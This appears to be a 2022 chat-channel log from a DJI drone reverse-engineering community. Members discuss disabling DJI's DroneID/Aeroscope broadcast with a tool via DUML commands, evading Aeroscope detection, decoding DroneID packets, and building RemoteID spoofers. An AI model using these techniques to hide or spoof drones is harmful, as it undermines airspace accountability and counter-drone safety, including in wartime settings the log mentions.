[2022-06-26 11:36:29] eddy : FYI - DJI mini3 has Remote ID activated by default. It's verified by me using "https://github.com/opendroneid/receiver-android" Any idea what to do with that? -------------------------------------------------- ----- Aircraft firmware: 01.00.0100 RC firmware: 01.00.0200 apk version: 1.6.1

[2022-06-26 20:29:49] tissy : Which country are you in @eddy ?

[2022-06-26 21:19:45] eddy : CE - Slovakia

[2022-06-26 22:10:40] tissy : Many thanks @eddy . I wasn’t sure if the remoteID transmission was country specific as I don’t think the Mini 3 transmits the new OpenID in the UK. Will need to test again tomorrow.

[2022-06-26 22:19:50] eddy : I do not own Mavic 3, but according to info from Czech republic, Remote ID is supposedly functional there.

[2022-06-26 22:56:15] tissy : Ahh, I thought you were confirming it does transmit as per your first post.

[2022-06-27 06:07:34] eddy : We probably don't understand. I confirm Remote ID on my Mini3 pro. But I can't confirm Remote ID on Mavic 3 because I don't own it. Misunderstanding from my side, I thought you were asking about Mavic 3. ;)

[2022-06-27 06:07:34] eddy : We probably don't understand. I confirm Remote ID on my Mini3 pro. But I can't confirm Remote ID on Mavic 3 because I don't own it. Misunderstanding from my side, I thought you were asking about Mavic 3. ;) Then provide feedback about it from UK.

[2022-06-27 06:07:34] eddy : We probably don't understand. I confirm Remote ID on my Mini3 pro. But I can't confirm Remote ID on Mavic 3 because I don't own it. Maybe my mistake, I thought you were asking about Mavic 3. Misunderstanding from my side ;)

[2022-06-27 06:07:34] eddy : We probably don't understand. I confirm Remote ID on my Mini3 pro. But I can't confirm Remote ID on Mavic 3 because I don't own it.

[2022-06-27 06:07:34] eddy : We probably don't understand. I confirm Remote ID on my Mini3 pro. But I can't confirm Remote ID on Mavic 3 because I don't own it. Maybe my mistake, I thought you were asking about Mavic 3. Misunderstanding from my side;)

[2022-06-27 06:56:31] eddy :

[2022-06-27 20:30:58] jjelo : jjelo joined the channel.

[2022-06-28 12:21:38] docsasha : docsasha joined the channel.

[2022-06-30 17:38:55] zorast : zorast joined the channel.

[2022-06-30 21:06:12] tissy : Has anyone considered / tried (is it even possible) to use CIAJeepDoors on an MCU running microPython for a portable deployment option please?

[2022-06-30 21:15:58] testuser00001 : I know it is running on MCU now, check the repo -- there is an issue detailing the use cases

[2022-06-30 21:44:48] tissy : Just checked the repo and can't see anything regarding it running on an MCU. Can you direct me please?

[2022-06-30 22:17:05] testuser00001 : My bad I thought there was but looks like there isn’t. Plugging it into the drone and duct taping then resending duml periodically is always an option though ?

[2022-07-01 00:37:29] hostile : @tissy yes. they call this an "Olga" in the Ukraine.

[2022-07-01 09:46:15] eddy : Hi @tissy, I'm curious about the UK test result.

[2022-07-01 14:05:25] tissy : Hi @eddy. Unfortunately no detection on the app. It was tested against a Mavic Mini 3 Pro running latest firmware (aircraft 01.000.0201, controller app 1.6.8). At the moment, there is no legal requirement in the UK for RemoteID. Therefore perhaps on DJI aircraft, it is only broadcast in regions where there is a legal requirement (based on the aircraft’s GPS perhaps).

[2022-07-01 14:14:20] eddy : Thanks @tissy for the feedback. Yes, it can be geo-sensitive. However, we also do not have a legal requirement for RID in our country. It is interesting ..

[2022-07-01 14:29:58] yaros : yaros joined the channel.

[2022-07-02 19:15:05] laen : Anyone using the "--bulk" option on CIAJD? I have no issues with the serial option but switching to bulk for a DJI Mini 2 it appears I'm having pyserial backend issues - the open_usb(po) in comm_serialtalk.py line 151 isn't picking up a backend and it eventually exits at line 183. Anyone that can throw me a bone? - I'm using libusb0.dll with no issues for serial connections.

[2022-07-02 19:31:19] deniss-i979 : Try connect dji assistant to drone, after connection close assistant and work with serial option on CIAJD

[2022-07-03 10:40:24] smart_beanz : smart_beanz joined the channel.

[2022-07-06 09:19:37] oxolot : DJI Mini 2 uses COM

[2022-07-06 14:33:32] dreamer : hello, what software and hardware do you use on your screen?

[2022-07-06 14:59:14] eddy : Hi @dreamer, it is mentioned in the post. It's "https://github.com/opendroneid/receiver-android" Use android studio to create the build.

[2022-07-06 14:59:14] eddy : Hi @dreamer, it is mentioned in the post. It's "https://github.com/opendroneid/receiver-android" Use android studio to create the build. .. and for example Galaxy s10 lite is working ..

[2022-07-07 09:15:24] n1ptune : n1ptune joined the channel.

[2022-07-07 22:52:20] hito_no_yume : yutasyutas joined the channel.

[2022-07-08 03:51:43] markisunsure : markisunsure joined the channel.

[2022-07-09 05:11:02] ababak1990 : ababak1990 joined the channel.

[2022-07-09 09:32:21] mitar111 : mitar111 joined the channel.

[2022-07-11 07:37:44] boris.plintovic : I read that the Aeroscope G-8 and G-16 work in the 2400-2500 and 5700-5850 bands. MavicPro/Platinum can be operated at frequencies 2.3 and 2.5 using jkson_fcc_mod. It means we can escape Aeroscope's eyes?

[2022-07-11 08:09:36] enigma2 : I guess : in WiFi mode-> detection in possible anyway by IE in RF(ocusync) mode-> OC droneid channels are constant and wont change - just hopping among some 2.4 Ghz predetermined channels.

[2022-07-11 08:09:36] enigma2 : I guess : in WiFi mode-> detection in possible anyway in RF(ocusync) mode-> OC droneid channels are constant and wont change - just hopping among some 2.4 Ghz predetermined channels.

[2022-07-11 08:09:36] enigma2 : I guess : in WiFi mode-> detection is possible by IE tag anyway in RF(ocusync) mode-> OC droneid channels are constant and wont change - just hopping among some 2.4 Ghz predetermined channels. so detection is possible again

[2022-07-11 08:09:36] enigma2 : I guess : in WiFi mode-> detection in possible by IE tag anyway in RF(ocusync) mode-> OC droneid channels are constant and wont change - just hopping among some 2.4 Ghz predetermined channels.

[2022-07-11 08:09:36] enigma2 : I guess : in WiFi mode-> detection in possible by IE tag anyway in RF(ocusync) mode-> OC droneid channels are constant and wont change - just hopping among some 2.4 Ghz predetermined channels. so detection is possible again

[2022-07-11 08:09:36] enigma2 : I guess : in WiFi mode-> detection in possible by IE tag anyway in RF(ocusync) mode-> OC droneid channels are constant and wont change - just hopping among some 2.4 Ghz predetermined channels.

[2022-07-11 08:09:36] enigma2 : I guess : in WiFi mode-> detection in possible anyway in RF(ocusync) mode-> OC channels are constant and wont change - just hopping among some 2.4 Ghz predetermined channels.

[2022-07-11 08:09:36] enigma2 : I guess : in WiFi mode-> detection in possible by IE tag anyway in RF(ocusync) mode-> OC droneid channels are constant and wont change - just hopping among some 2.4 Ghz predetermined channels.

[2022-07-13 01:34:42] enk2022 : enk2022 joined the channel.

[2022-07-13 04:04:48] enk2022 : I heard from some people that the controller is actually transmitting its serial number. Anyone knows if this is true? and can you see this in AeroScope?

[2022-07-13 10:22:10] enigma2 : NOT controller . its UAV transmitting flight controller serial number

[2022-07-15 11:13:39] jim9000 : jim9000 joined the channel.

[2022-07-15 15:06:14] xou : xou joined the channel.

[2022-07-17 18:40:38] nz-maori : @joonas I ve checked Dronelink App (Android 3.4.1) today. Drone ID stays disabled!

[2022-07-18 15:44:31] dfessence : dfessence joined the channel.

[2022-07-19 07:22:24] edward_tlt : edward_tlt joined the channel.

[2022-07-19 13:01:18] cedivad : cedivad joined the channel.

[2022-07-19 20:00:56] faineg : Per request from @hostile , here's some stuff I recently dug up on Telegram regarding Aeroscope use on the battlefield in Ukraine... https://twitter.com/faineg/status/1549477499024842753

[2022-07-19 20:01:21] faineg : https://twitter.com/faineg/status/1549474619282833408

[2022-07-19 20:01:38] faineg : https://twitter.com/faineg/status/1549469626366582784

[2022-07-19 20:01:46] faineg : https://twitter.com/faineg/status/1549467347970400264

[2022-07-21 13:01:00] laen : Good stuff Faine, just to understand the context - is this survival advice sourced from Russians To Russian DJI operators? I.e so Russians can evade Ukrainian drones with their own Mavics; or is it more so a PSA for Russians on how Ukrainian forces are evading detection ?

[2022-07-21 13:53:54] dkovar : Russians are using the same capabilities to evade Ukrainian CUAS as the Ukrainians use to evade Russian CUAS. The exploits are out there for anyone to use.

[2022-07-21 15:07:58] azerbaijan : I think you have much better opinion about Russians, they really are.

[2022-07-23 13:48:44] dronelabdk : dronelabdk joined the channel.

[2022-07-26 15:32:44] shuke : 大疆精灵3如何开启fcc

[2022-07-27 12:19:18] sups : sups joined the channel.

[2022-07-27 14:00:00] hostile : And to complement what @dkovar said. DJI has also obviously been pushing out firmware that no longer accepts DUML to disable DroneID. The Mavic M3 GPS fix firmware is known to be this way for example

[2022-07-27 14:21:43] stanlee : Interesting - introduce a massive bug that shouldn't be there. Then wait until people are dying for a fix...then make restrictions part of the "fix".

[2022-07-27 20:57:37] viiince : viiince joined the channel.

[2022-07-27 21:27:04] fredmicrowave : They never announced in their firmware update info that they removed the ability to disable droneid .

[2022-07-27 23:32:11] stanlee : They never announce anything in their updates when they do sneaky shit. Usually “optimized performance” or some garbage like that.

[2022-07-28 01:27:22] fredmicrowave : DJI could be great if it was not for this kind of behavior and lack of transparency they have used us to. Anyway, removing features to a purchased item without informing the user must be illegal...

[2022-07-28 06:50:55] anesta : anesta joined the channel.

[2022-07-28 07:07:56] oxolot : Any idea how this block is implemented and how to circumvent?

[2022-07-29 04:17:29] stanlee : “Illegal”? Doubtful. It’s not criminal for them to tighten up restrictions. It’s sheisty, sort of unethical, and duplicitous. But not “illegal”.

[2022-07-30 15:52:52] matsan : matsan joined the channel.

[2022-08-01 18:04:29] enk2022 : Decoding the DroneID packet, how do you know the drone model? I played with mini 2 packets and i searched for ascii to see "mini" anywhere and i didn't. Am i missing something?

[2022-08-01 18:04:29] enk2022 : Decoding the DroneID packet, how do you know the drone model? I played with mini 2 packets and i searched for ascii to see "mini" anywhere and i didn't find anything. Am i missing something?

[2022-08-01 19:06:52] tmbinc : Serial number I think?

[2022-08-01 19:17:02] dmitry : dmitry joined the channel.

[2022-08-01 22:09:32] tissy : Look for the product type. Mavic Mini is product type “35”, Mini SE is “46” & Mini 2 is “3F”.

[2022-08-01 22:22:27] fredmicrowave : @enk2022 This may help : https://www.dji-rev.com/dji-rev/pl/jf8idgzzff8cpqcts1zhehipac

[2022-08-02 00:47:20] nopexecutor : I think byte 67? (at least in my counting...) had model id

[2022-08-02 00:47:28] nopexecutor : {0x10, "Mavic Pro"}, {0x24, "Phantom 4 Pro V2"}, {0x29, "FPV"}, {0x3A, "Mavic Air 2"}, {0x3F, "Mavic Mini 2"}

[2022-08-02 00:47:33] nopexecutor : sth. like that

[2022-08-03 12:53:20] xakep : xakep joined the channel.

[2022-08-04 18:57:25] nz-maori : Maybe a silly question, if I disable DroneID with CIAJD will the RC Pro enable it again?

[2022-08-08 10:21:53] mib_imperator : mib_imperator joined the channel.

[2022-08-08 14:59:18] hostile : If someone is bored... could probably write a module for Flipper Dev board to spoof out the base Wifi packets for RemoteID. (obviouly won't be 1/4 rate, but Aeroscope doesn't care). https://shop.flipperzero.one/collections/flipper-zero-accessories/products/wifi-devboard

[2022-08-10 13:51:01] hostile : these are perfect for Throwies.

[2022-08-10 13:51:02] hostile : https://www.suasnews.com/2022/08/ardupilot-remoteid-support/

[2022-08-10 13:51:09] hostile : can easily be repurposed into spoofers

[2022-08-10 23:23:07] enk2022 : How does the drone id look like in Lightbridge DL?

[2022-08-11 02:21:40] hito_no_yume : https://viewpoints.dji.com/blog/how-djis-aeroscope-system-protects-the-public-interest

[2022-08-11 02:26:25] hito_no_yume : "Unlike almost all other DJI drone data, the AeroScope signal is unencrypted by design, since it is meant to be easily processed by a receiver that may not be nearby. **And while it is not encrypted, it is protected by a proprietary signal protocol that is not easily understood**." "Every DJI drone automatically transmits AeroScope information; there is no way for a drone user to turn the signal off because that would defeat AeroScope’s purpose of promoting accountable and responsible drone use. ..... **The pilot's location is built into the AeroScope signal and cannot be turned off**"

[2022-08-11 12:53:39] pequad : pequad joined the channel.

[2022-08-12 21:51:33] xou : Does the dji fpv racer(wm170) also send droneid? Can CIAJeepDoors work with dji fpv?

[2022-08-17 17:48:58] pingspike : @speatuk ??

[2022-08-24 00:06:20] austinc3030 : austinc3030 joined the channel.

[2022-08-25 06:47:11] infinitydrones : infinitydrones joined the channel.

[2022-08-26 06:44:25] harryemery92 : harryemery92 joined the channel.

[2022-08-26 07:47:51] dmtstarpilot : dmtstarpilot joined the channel.

[2022-08-26 22:31:15] andysayle : andysayle joined the channel.

[2022-08-26 23:10:46] venom-code : venom-code joined the channel.

[2022-08-27 19:11:26] hostile : https://dji-rev.com/dji-rev/pl/3ttgea4xiingjg779anhzn814o

[2022-08-28 11:32:33] varvar : varvar joined the channel.

[2022-08-28 18:50:26] speatuk : @harryemery92 ??

[2022-08-30 00:17:29] molten_roll : molten_roll joined the channel.

[2022-08-30 14:01:09] hostile : https://dji-rev.com/dji-rev/pl/dwpzpoytyjbcppksmrswoyygqr

[2022-08-31 10:45:17] oxolot : Cool stuff. But recently we are forced to install higher than 1.5.10 version of DJI Fly. It comes with some recent Android 12 updates. DJI Fly 1.5.10 just stopped opening (collapses). Nothing helps except upgrade to newer versions which are reverting the privacy mask to 11111111. Any advice how to deal with that?

[2022-08-31 11:28:02] kilrah : Use an old phone...

[2022-08-31 13:29:36] harryemery92 : Strange thing is I have samsung s10 running android 12 and the dji fly 1.5.10 works on that bit it wont on my samsung s20

[2022-08-31 16:23:30] oxolot : Can you please check in your settings -->About phone-->Software information what versions of Google Play system update you have on both - working and non-working phones? I suspect that anything newer than Jan 1 2022 will block use of 1.5.10

[2022-08-31 16:32:09] adasxdm : adasxdm joined the channel.

[2022-08-31 18:08:36] harryemery92 : Just checked the Samsung s20 plus that says Google play system July 1 2022 and the Samsung s10 Google play system is 1st june 2022

[2022-08-31 18:18:10] harryemery92 : I now have both Google play system 1 july 2022 on Samsung s20 plus and the Samsung s10 the samsung s10 will open the dji fly app version 1.5.10 without crashing the Samsung s20 crashes soon as you load dji fly app 1.5.10 abit strange

[2022-08-31 18:38:49] oxolot : So it is not Google play... Thanks for checking though. I have exact situation with S20 - July 1st. My DJI Fly started to crash about a week ago with no obvious reasons. I don't even update this phone - always reject if it asks me to agree on something. I don't get it...

[2022-08-31 18:40:28] oakley75 : Seems silly, but does clearing the cache do anything? Me being me ha, I'd wipe the partition cache just for shits n giggles

[2022-08-31 18:40:28] oakley75 : Seems silly, but does clearing the cache do anything?

[2022-08-31 18:42:00] oxolot : Older phone with new Android (12) works, but newer phone with same Android - does not. What is going on? How old the old phone should be in order to work? :exploding_head:

[2022-08-31 19:15:15] harryemery92 : @oxolot have tried all of that doesnt make any difference

[2022-08-31 19:17:08] harryemery92 : Has anyone had any luck running the open drone id apk on Android 12 modding the map to use Google maps soon as I allow permissions it closes instantly

[2022-08-31 20:50:16] oxolot : I have tried that since sometimes when DJI Fly collapses - it suggests to clear cache. It did not help - it keeps crushing.

[2022-08-31 23:46:52] fredmicrowave : I have tried CIAJeepDoor on my M3, and there is something weird with it. This is what it shows, instead of "111111111" Enabling or disabling makes no difference

[2022-08-31 23:46:52] fredmicrowave : I have tried CIAJeepDoor on my M3, It seems to work fine and read the drone status, but there is something weird with it. This is what it shows, instead of "111111111" Enabling or disabling makes no difference

[2022-08-31 23:46:52] fredmicrowave : I have tried CIAJeepDoor on my M3, It seems to work fine and read the drone status, but there is something weird about it. This is what it shows, instead of "111111111" Enabling or disabling makes no difference

[2022-08-31 23:46:52] fredmicrowave : I have tried CIAJeepDoor on my M3, It seems to work fine and read the drone config, but there is something weird with it. This is what it shows, instead of "111111111" Enabling or disabling makes no difference

[2022-08-31 23:47:31] fredmicrowave : Then on the remote Aeroscope show as disabled, but if I try to enable it is gets back to disabled right away

[2022-08-31 23:47:31] fredmicrowave : Then on the remote, Aeroscope show as disabled, but if I try to enable it is gets back to disabled right away Fly v 1.5.10 , drone is on .655

[2022-08-31 23:47:31] fredmicrowave : Then on the remote, Aeroscope show as disabled, but if I try to enable it is gets back to disabled right away

[2022-09-01 09:28:22] oxolot : AFAIK 010111111 is standard value which comes with the drone when we just buy it. .655? Strange number. There are .0500, .0600, .0700, but .655? Is it how it arrived from the store?

[2022-09-01 10:25:12] cs2000 : 0655 was an internal DJI beta. The notes below are from DDD as i made that FW available to the public: This firmware is BETA and was targeted at fixing the GPS Lock-On/Sync issues that affected the MP3 on the previous public firmware build (01.00.0600). This firmware comes with no release notes from DJI but has been shown to contain all the same fixes and additions as 01.00.0700 BUT doesn't increase the ARB number. This firmware is being released to the public by DDD as i do not agree with DJI basically saying "if you want your GPS to work, then you need to have an ARB bump" as this clearly limits hacking/modding potential moving forwards.

[2022-09-01 10:25:12] cs2000 : 0655 was an internal DJI beta. The notes below are from DDD as i made that FW available to the public as i did not agree with DJI forcing a ARB bump just to get your GPS working again: This firmware is BETA and was targeted at fixing the GPS Lock-On/Sync issues that affected the MP3 on the previous public firmware build (01.00.0600). This firmware comes with no release notes from DJI but has been shown to contain all the same fixes and additions as 01.00.0700 BUT doesn't increase the ARB number. This firmware is being released to the public by DDD as i do not agree with DJI basically saying "if you want your GPS to work, then you need to have an ARB bump" as this clearly limits hacking/modding potential moving forwards.

[2022-09-01 10:42:26] oxolot : I see. Thanks for explanation. Interesting. Any idea if we can hide DroneID on this one? On .0700 it is not possible. So actually, maybe this is your problem - since 655 is like 700 except for ARB

[2022-09-01 10:42:26] oxolot : I see. Thanks for explanation. Interesting. Any idea if we can hide DroneID on this one? On .0700 it is not possible

[2022-09-01 11:16:24] fredmicrowave : Possibly, but it still shows "aeroscope" disabled on the RC screen, except you cant enable it :face_with_rolling_eyes: And on Digdat video its should show all "1" , but I am not sure on what drone. 655 is really good btw, fast satellite reception even in more difficult conditions.

[2022-09-01 13:44:53] cs2000 : @fredmicrowave Im just passing information on, heres the details of what the privacy bits mean

[2022-09-01 13:44:53] cs2000 : @fredmicrowave Im just passing information on, here's the details of what the privacy bits mean (the X indicates the position, obvious 1 is enabled, 0 is disabled)

[2022-09-01 13:46:52] cs2000 : As for 0655 and 0700, as far as my limited abilities go, they're the same apart from the ARB bump, so it may not be 100% compatible. But as i say, limited abilities and no devices to test this on, so cannot confirm

[2022-09-01 13:50:10] hostile : https://dji-rev.com/dji-rev/pl/ztpkdwmfwj8q5e5qw9nybutnuh

[2022-09-01 13:51:19] hostile : @fredmicrowave the M3 firmware with GPS fixes does not work with CIAJD. It was among the first firmware in which they disabled the DUML commands.

[2022-09-01 14:06:15] cs2000 : Cheers for the confirmation @hostile :thumbsup:

[2022-09-01 14:26:54] fredmicrowave : Interesting, thanks @cs2000 and @hostile

[2022-09-01 14:27:40] fredmicrowave : So that would be hide unknown and uuid .

[2022-09-01 14:29:03] fredmicrowave : I could always roll back but i like the gps fix...

[2022-09-01 14:52:04] fredmicrowave : Interesting that I cannot add uuid any more (not that I want to) but I wonder how DJI fixed that, probably in more recent Fly App versions.

[2022-09-01 18:28:24] pve : pve joined the channel.

[2022-09-01 21:18:11] oxolot : This Aeroscope thing in the software menu has nothing to do with the state of bits which we are changing with the DUML command. The only thing we learned that if you enter that part of menu (Safety) - the bits revert from zeroes to ones even if you do nothing there.

[2022-09-01 21:28:52] quad808 : and sneaky DJI strikes again....

[2022-09-02 02:22:30] fredmicrowave : That´s good to know, and disgusting from DJI. Does that occurs with earlier firmware versions too, or just from 655 on ?

[2022-09-02 09:34:47] oxolot : All of them

[2022-09-02 10:39:42] cs2000 : yeah, it should be all of them, Any of the beta FW targeted at fixing the GPS sync issues had that DUML command removed

[2022-09-02 11:08:44] fredmicrowave : Ok, thanks !

[2022-09-02 12:21:00] capra_vecinului : Hello everyone! Been away from the drone world, due to my Mavic Pro being sick for over a year (gimbal malfunction). Meanwhile I found out by chance that there are also other third party guidance apps for our DJI drones, for example “Maven”. Apart from Litchi, which is quite old, what other third party apps would you recommend? I’m using iOS; so Android apps would not help in my case.

[2022-09-04 16:20:45] h_marshall : Hey people I have the same issue as @fredmicrowave with disabling droneid onMavic 3 and 0700. Sorry for stupid question, but is it possible to downgrade Mavic 3, maybe with DUMLdore?

[2022-09-04 18:48:35] fredmicrowave : Not with 0700 afaik, since it is the first of the versions that has antirollback enabled.

[2022-09-05 16:39:02] geek2009 : geek2009 joined the channel.

[2022-09-06 11:08:24] speatuk : Thank you soo much for this @bin4ry ? I haven’t tried this on my DJI FPV yet, just not got round to it. Has anyone tried it and does it work? Many thanks in advance ??

[2022-09-06 15:10:07] speatuk : Just add from my previous post yes this does work with the DJI FPV

[2022-09-06 19:36:47] loaderbull : Same on Air 2S, just ran the .exe and selected com port. Disabled. Rebooted drone. Still disabled. Good times.

[2022-09-06 21:37:08] quad808 : Just to be sure, I would run a check again after connecting to DJI FLY....never can tell with DJI nowadays

[2022-09-07 08:59:00] speatuk : Why would I connect to the fly app. Not been connected to that app since I got the DH export. ?

[2022-09-07 16:49:30] loaderbull : The FPV is something that can run without isnt it? The Air 2S is isnt. Hence Quads statement i assume (unless Litchi is used obvs).

[2022-09-08 00:49:53] enk2022 : Hey all

[2022-09-08 00:54:18] enk2022 : I was just wondering, is there anything like a DroneID packet in Lightbridge based drones similar to OcuSync? and is DroneID packet the only way to transmit the telemetry/GPS of a drone or is it being sent in other packets as well?

[2022-09-08 21:04:43] nopexecutor : not sure about lightbridge. In ocusync also some other packets, from the encrypted part of communication, contain similar info like DroneID packets

[2022-09-09 07:21:22] harryemery92 : Has anyone used this https://github.com/dronetag/drone-scanner

[2022-09-09 19:02:24] uawaa : uawaa joined the channel.

[2022-09-09 19:22:35] uawaa : I have access to DJI Aeroscope stationary version with 4 antennas, is there anything I can do to contribute?

[2022-09-09 19:23:19] uawaa : Meanwhile is there a way to downgrade Mavic 3 from 1.00.0700 to get the DUML working again?

[2022-09-09 19:27:49] uawaa : The Aeroscope requires internet connection to verify the ssl cert to be able to use it, but because it uses dji assistant for aeroscope, it opens a websocket and there is an API available even when it's offline

[2022-09-09 19:29:45] uawaa : And I was told that there has not been updates for the software for over 2 years now, so they are using the same legacy droneID even for new drones

[2022-09-09 19:32:15] uawaa : Last year talking with a DJI representative they told that they are going to stop selling Aeroscope detectors (within a couple of years) and focus on drone market instead of anti-drone market because the latter has developed so much that their product is no longer the best

[2022-09-10 10:43:54] pingspike : @uawaa that ties in with my experiences last week when I tried to buy an AeroScope Mobile from a DJI outlet in the UK. Their response:

[2022-09-10 18:13:04] d95gas : https://www.heliguy.com/products/rental-dji-aeroscope-mobile

[2022-09-10 18:13:29] d95gas : £749 per week to rent it :-)

[2022-09-10 20:48:57] pve : I tried the original app https://github.com/opendroneid/receiver-android from which it's derived. Nothing caught - of course, DJI broadcasting is completely diferrent from OpenDroneID. OpenDroneID can receive anyone with bkluetooth/wifi device, but DJI DroneID can receive only who bought Aeroscope.

[2022-09-11 11:44:47] tissy : I believe that newer model of DJI, such as Mavic Mini 3, do transmit OpenDroneID alongside Aeroscope transmissions in countries such as Japan that have now mandated it.

[2022-09-11 15:21:59] pve : Yes, maybe, I'm not sure if the Japanese DroneID is the same as OpenDroneID. I've mini-2 with older firmware (and don't plan any firmware update, of course) :)

[2022-09-13 20:17:02] quad808 : What would be great to have is a list of drones and CIA Jeepdoors compatibility list....verified by someone who actually has access to an Aeroscope. Drone and firmware version. Did anyone do this yet?

[2022-09-13 21:07:31] tissy : I am hoping to undertake this task next week. This will include which FW version it has been tested against.

[2022-09-15 09:38:15] urca87 : urca87 joined the channel.

[2022-09-16 16:46:02] enigma2 : any body knows which firmware of P4Pv2/ Mavic Pro has activated DroneID? or it was already activated from the beginning? (for Leadcore DSP firmware comparison) .

[2022-09-16 16:46:02] enigma2 : any body knows which firmware of P4 has activated DroneID? or it was already activated from the beginning? (for Leadcore DSP firmware comparison) .

[2022-09-16 16:46:02] enigma2 : any body knows which firmware of P4Pv2 has activated DroneID? or it was already activated from the beginning? (for Leadcore DSP firmware comparison) .

[2022-09-16 16:48:01] enigma2 : and is there any ceva toolkit installation file?

[2022-09-16 22:46:13] tissy : I believe RemoteID was activated from the beginning, ie from the production line.

[2022-09-17 06:39:05] sambuko : How to check if ciajeepdoors work without Aeroscope?

[2022-09-17 07:22:42] enigma2 : checking the flags. Disabled or enabled . it has been tested. it Worked on AS Mobile !

[2022-09-17 07:22:42] enigma2 : checking the flags. Disabled or enabled . it has been tested. it Worked !

[2022-09-17 07:22:42] enigma2 : checking the flags. Disabled or enabled

[2022-09-18 18:09:27] capra_vecinului : I might be mistaken, but 700 was the last firmware of Mavic Pro without DroneID. I am on 700, checked with Jeep Door and it shows no ID.

[2022-09-21 17:15:52] ihackftw : ihackftw joined the channel.

[2022-09-22 17:20:40] foriequals0 : foriequals0 joined the channel.

[2022-09-23 03:14:19] enk2022 : anyone happened to know what scrambler lightbridge downlink is using?

[2022-09-23 03:14:33] enk2022 : if any

[2022-09-23 03:19:45] enk2022 : or at least some idea how I can find it

[2022-09-23 09:07:34] asae2207 : asae2207 joined the channel.

[2022-09-23 16:59:12] proto : The uplink def uses a scrambler, so I would assume the downlink does to

[2022-09-23 23:02:35] enk2022 : Thank you for confirming this. Do you know how you can find it for uplink or downlink?

[2022-09-23 23:02:35] enk2022 : Thank you @proto for confirming this. Do you know how you can find it for uplink or downlink?

[2022-09-23 23:02:35] enk2022 : Thank you @proto for confirming this. Do you know how you can find the scrambling code for uplink or downlink?

[2022-09-24 09:46:22] skyninja : wasn't based on wimax? what scrambler is used by wimax?

[2022-09-24 09:46:22] skyninja : wasn't it based on wimax? what scrambler is used by wimax?

[2022-09-24 15:34:28] fredmicrowave : I found this very useful to help understanding or extract information, it was used to get video from Falcon9 rockets telemetry, for example : https://github.com/altillimity/SatDump

[2022-09-25 17:22:33] proto : I don't recall. One of the tricks we played was to re the board and inject our own payloads. That allowed us to send walking bit patterns and track where bits ended up.

[2022-09-26 01:11:26] jackmax : jackmax joined the channel.

[2022-09-26 10:00:25] chrboesch : chrboesch joined the channel.

[2022-09-26 19:16:38] fastload : fastload joined the channel.

[2022-09-27 08:00:46] w0h : Hi, does anyone know if DJI used Bluetooth or WiFi to implement the Japanese RID regulations in the Mini 2 and Air 2S updates?

[2022-09-28 23:07:59] andrej : andrej joined the channel.

[2022-09-29 09:44:10] wdesign : wdesign joined the channel.

[2022-09-29 09:53:37] sertyz : sertyz joined the channel.

[2022-10-03 20:00:39] alt.nq-5711k93 : alt.nq-5711k93 joined the channel.

[2022-10-04 06:38:50] itismo : itismo joined the channel.

[2022-10-04 07:45:17] xiaohuge365 : lixuans joined the channel.

[2022-10-04 07:49:02] xiaohuge365 : 这个文件是大疆农业机器T20的维修手册

[2022-10-04 07:55:31] xiaohuge365 : 这个文件是大疆农业机器T16的维修手册

[2022-10-04 07:56:57] xiaohuge365 : 农业用户，建议关注这个网址：djiag.com

[2022-10-04 07:57:26] xiaohuge365 : 农业用户，建议关注这个网址： [djiag.com](url)

[2022-10-04 07:58:08] xiaohuge365 : 农业用户，建议关注这个网址： [大疆农业]( djiag.com)

[2022-10-04 23:25:00] itismo : 0600 is where the GPS is fixed and still works with CIAJD

[2022-10-05 07:53:46] cs2000 : Sorry, that is incorrect. 01.00.0600 was the last public attempt at the GPS fix issue. FW 01.00.0606 through to 01.00.0655 were beta/internal test releases, released almost on a daily schedule which were aimed at fixing the GPS issue for good. 01.00.0600 is better than the FW that came before it, but it still wasn't truly fixed, many many owners were still complaining about slow GPS lock times. These GPS issues were finally fixed on 0655 and DJI released 01.00.0700 to the public with GPS fully working and an ARB bump too. I know this as i was working alongside someone who was receiving Beta FW directly from DJI during this testing phase.

[2022-10-05 20:10:52] sambuko :

[2022-10-05 20:11:45] sambuko :

[2022-10-05 20:13:11] sambuko :

[2022-10-05 20:22:45] sambuko : I offer new challenge "share dji dealers documents". Next one i hope will vpn :smiley:

[2022-10-05 20:22:45] sambuko : I offer new challenge "share dji dealers documents". Next one i suppose will vpn :smiley:

[2022-10-05 20:22:45] sambuko : I offer new challenge share dji dealers documents. Next one i suppose will vpn :smiley:

[2022-10-06 04:59:06] sambuko : Please don't write to direct. I don't have vpn. Even if it will available, i will not share it. Besides, as i know vpn updating every week.....

[2022-10-06 04:59:06] sambuko : Please don't write to direct about vpn. I don't have vpn. Even if it will available, i will not share it. Besides, as i know vpn updating every week.....

[2022-10-06 19:14:54] sambuko : does ciajeepdoors support mavic 3?

[2022-10-06 19:14:54] sambuko : does ciajeepdoors support mavic 3? i checked on .400 firmware. It works

[2022-10-06 21:27:44] sambuko : Are there any solutions to create a copy of the aeroscope?

[2022-10-07 09:47:23] ustinovmihail98 : ustinovmihail98 joined the channel.

[2022-10-07 12:21:27] papalegba : papalegba joined the channel.

[2022-10-11 16:51:37] tissy : Has DJI intentionally cleared down the "product type" JSON within the com.dji.areoscope folder of Aeroscope portable units? All drones being detected are now 'NewDrone_XX', so there is no definition lookup table. Any one able to confirm if their mobile unit is the same please? The 'Product' file is now just 2bytes containing ‘{}’.

[2022-10-11 16:51:37] tissy : Has DJI intentionally cleared down the "product type" JSON within the com.dji.areoscope folder of Aeroscope portable units? All drones being detected are now 'NewDrone_XX', so there is no definition lookup table. Any one able to confirm if their mobile unit is the same please? The 'Product' file is now just 2b containing {}

[2022-10-11 18:15:43] the_lord : confirmed, once connected to the internet the file updated to 2 bytes

[2022-10-11 18:33:50] tissy : Hmmmm, wonder if that is intentional or a bug.

[2022-10-11 22:17:31] the_lord : most probably its a bug

[2022-10-11 22:58:13] enk2022 : yes new drones are detected as NewDrone_XX

[2022-10-11 23:02:23] tissy : ALL drones are being detected as NewDrone_XX as the definition / product JSON file has been wiped.

[2022-10-11 23:02:23] tissy : ALL drones are being detected as NewDrone_XX @enk2022 as the definition / product JSON file appears to have been wiped. The web link where this file was hosted on DJI servers now relates to something else.

[2022-10-12 07:52:04] cs2000 : Hmm, wonder if this is a bug, an oversight or there will be a new FW released with a new URL for the JSON lookup file

[2022-10-12 07:52:04] cs2000 : Hmm, wonder if this is a bug an oversight or there will be a new FW released with a new URL for the JSON lookup file

[2022-10-12 12:42:19] r99bbit : r99bbit joined the channel.

[2022-10-13 08:50:22] woveniy992 : woveniy992 joined the channel.

[2022-10-14 08:09:30] sparkyws : sparkyws joined the channel.

